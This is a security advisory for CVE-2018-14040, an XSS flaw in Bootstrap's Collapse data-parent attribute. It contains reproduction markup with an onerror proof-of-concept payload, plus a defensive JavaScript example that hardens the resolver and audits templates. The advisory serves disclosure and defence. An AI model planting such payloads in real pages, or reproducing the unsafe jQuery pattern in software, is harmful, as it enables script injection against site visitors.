CVE-2018-14040

Cross-Site Scripting
Affects: Bootstrap
Versions: >=2.3.0 <=2.3.2, >=3.0.0-rc1 <3.4.0, >=4.0.0-alpha <4.1.2
Patch Available

This vulnerability has been fixed in the Never-Ending Support (NES) version offered by HeroDevs.

Overview

Bootstrap is an HTML, CSS, and JS framework for developing responsive, mobile-first web sites and applications.

A cross-site scripting (XSS) vulnerability (CVE-2018-14040) has been identified in the Bootstrap Collapse component (the accordion in Bootstrap 2). The affected version ranges above span Bootstrap 2, 3 and 4; this page documents the Bootstrap 2 case.

Per OWASP: Cross-Site Scripting attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. An attacker can use XSS to send a malicious script to an unsuspecting user.

Details

Vulnerability Info

This Medium-severity vulnerability is the result of improper handling of the data-parent attribute: an attacker who controls the attribute's value can inject JavaScript that runs in the page.

The data-parent attribute names the ancestor container of a set of collapsible elements and is expected to hold a CSS selector such as #accordion. The affected code hands the raw attribute value straight to jQuery (this.$parent = $(this.options.parent)) without validating that it is a selector. jQuery's $() treats a string that starts with "<" as HTML markup rather than as a selector, so a value such as <img src='1' onerror='alert(1)' /> is parsed into a real element, and its onerror handler fires as soon as the image fails to load, even though the element is never inserted into the document.

Steps To Reproduce

  • Create an HTML page that loads jQuery and Bootstrap v2 and contains an accordion component.
  • Change one of the data-parent attributes to contain the following value: <img src='1' onerror='alert(1)' />
  • Click the “'data-parent' XSS Example” link. The click instantiates the Collapse plugin, which passes the attribute value to jQuery's $(); jQuery builds the <img> element and its onerror handler executes.
  • Example:
<div class="accordion" id="accordion">
  <div class="accordion-group">
    <div class="accordion-heading">
      <a
        class="accordion-toggle"
        data-toggle="collapse"
        data-parent="#accordion"
        href="#collapseOne"
      >
        Collapsible Group Item #1
      </a>
    </div>
    <div id="collapseOne" class="accordion-body collapse in">
      <div class="accordion-inner">Anim pariatur cliche...</div>
    </div>
  </div>
  <div class="accordion-group">
    <div class="accordion-heading">
      <a
        class="accordion-toggle"
        data-toggle="collapse"
        data-parent="<img src='1' onerror='alert(1)' />"
        href="#collapseTwo"
      >
        'data-parent' XSS Example
      </a>
    </div>
    <div id="collapseTwo" class="accordion-body collapse">
      <div class="accordion-inner">Anim pariatur cliche...</div>
    </div>
  </div>
</div>
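The following is an added example, not code from Bootstrap, jQuery or the HeroDevs page. It ties together the mechanism described under Vulnerability Info and the markup in the reproduction above: it reproduces jQuery's own rule for deciding when a string is HTML, contrasts the vulnerable resolver pattern (this.$parent = $(this.options.parent)) with a hardened one that only ever performs a selector lookup, and runs a small audit over a constructed copy of the accordion markup to flag data-parent values that would reach jQuery as markup. The fakeJQuery and fakeDocument stand-ins, the SAMPLE_HTML string and every function name are assumptions made so the example runs under Node without a browser.

```javascript
// Added example (not Bootstrap's or jQuery's code). Demonstrates the CVE-2018-14040
// sink, a hardened data-parent resolver, and an audit over markup.

// jQuery's dispatch rule (jQuery 3.x core, init): a string that starts with "<"
// and contains ">" is parsed as HTML; "#id" is an id lookup; anything else is a
// selector. jQuery older than 1.9 treated a "<" anywhere in the string as HTML.
const rquickExpr = /^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]+))$/;

function jqueryTreatsAsHtml(value) {
  const m = rquickExpr.exec(String(value));
  return Boolean(m && m[1]);
}

// Mirrors the vulnerable pattern: this.$parent = $(this.options.parent).
// `$` is injected so the example runs without a DOM; in a browser it is jQuery.
function resolveParentUnsafe(value, $) {
  return $(value);
}

// Hardened resolver: the value must be a selector string and is looked up under a
// root node (document in a browser), so a crafted value can select elements but
// never create them. No valid CSS selector contains "<", so any "<" is rejected
// outright, which also covers the pre-1.9 jQuery behaviour.
function resolveParentSafe(value, root) {
  if (typeof value !== 'string' || value.trim() === '' || value.includes('<')) {
    return null;
  }
  try {
    return root.querySelector(value); // invalid selector -> SyntaxError, not markup
  } catch (e) {
    return null;
  }
}

// The browser decodes entities inside attribute values before Bootstrap reads
// them, so an audit of raw templates must decode too or it misses &lt;img ...&gt;.
function decodeAttr(value) {
  return value
    .replace(/&lt;/g, '<').replace(/&gt;/g, '>')
    .replace(/&quot;/g, '"').replace(/&#39;/g, "'")
    .replace(/&amp;/g, '&');
}

// Scan markup for data-parent attributes whose value could reach $() as markup.
function auditDataParent(html) {
  const attr = /data-parent\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;
  const findings = [];
  let m;
  while ((m = attr.exec(html)) !== null) {
    const value = decodeAttr(m[1] !== undefined ? m[1] : m[2]);
    findings.push({
      value,
      unsafe: value.includes('<'),                 // conservative: any jQuery version
      htmlOnModernJQuery: jqueryTreatsAsHtml(value), // what jQuery >= 1.9 would do
    });
  }
  return findings;
}

// Constructed sample: the page's accordion, trimmed, plus an entity-encoded variant.
const SAMPLE_HTML = `
<div class="accordion" id="accordion">
  <a data-toggle="collapse" data-parent="#accordion" href="#collapseOne">Item 1</a>
  <a data-toggle="collapse" data-parent="<img src='1' onerror='alert(1)' />" href="#collapseTwo">XSS</a>
  <a data-toggle="collapse" data-parent='&lt;img src=x onerror=alert(2)&gt;' href="#collapseThree">Encoded</a>
</div>`;

const PAYLOAD = "<img src='1' onerror='alert(1)' />";

// Stand-ins for browser objects (assumed, so this runs under Node).
// fakeJQuery records whether it was asked to build markup, the XSS sink in a browser.
function fakeJQuery(value) {
  return { createdMarkup: jqueryTreatsAsHtml(value), value };
}
const fakeDocument = {
  querySelector(sel) {
    if (!/^[#.]?[\w-]+$/.test(sel)) throw new SyntaxError('bad selector');
    return sel === '#accordion' ? { id: 'accordion' } : null;
  },
};

function demo() {
  return {
    unsafe: resolveParentUnsafe(PAYLOAD, fakeJQuery).createdMarkup, // true: markup built, onerror fires
    safe: resolveParentSafe(PAYLOAD, fakeDocument),                 // null: rejected before any lookup
    legit: resolveParentSafe('#accordion', fakeDocument),           // the real container
    flagged: auditDataParent(SAMPLE_HTML).filter((f) => f.unsafe).length, // 2
  };
}
```

In a real page resolveParentSafe would take document as its root; the audit is meant to be run over templates or rendered pages before they ship, and the entity decoding is the step most ad-hoc greps miss.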

Mitigation

The Bootstrap 2 line is End-of-Life and will not receive an upstream update to address this issue.

Users of the affected components should apply one of the following mitigations:

  • Migrate affected applications to a supported version of Bootstrap. Per the version ranges above, the fix ships in 3.4.0 and 4.1.2; any later release in those lines is unaffected.
  • Leverage a commercial support partner like HeroDevs for post-EOL security support.

Until one of these is in place, treat data-parent as code rather than data: set it only to a fixed selector in your own markup and never populate it from user-controlled input.

Credits

  • 1Jesper1 (finder)
Vulnerability Details
ID
CVE-2018-14040
PROJECT Affected
Bootstrap
Versions Affected
>=2.3.0 <=2.3.2, >=3.0.0-rc1 <3.4.0, >=4.0.0-alpha <4.1.2
Published date
February 28, 2025
≈ Fix date
February 28, 2025
Severity
Medium
CVSS bands used on this page: Low >=0 <4; Medium >=4 <6; High >=6 <8; Critical >=8 <10
Category
Cross-Site Scripting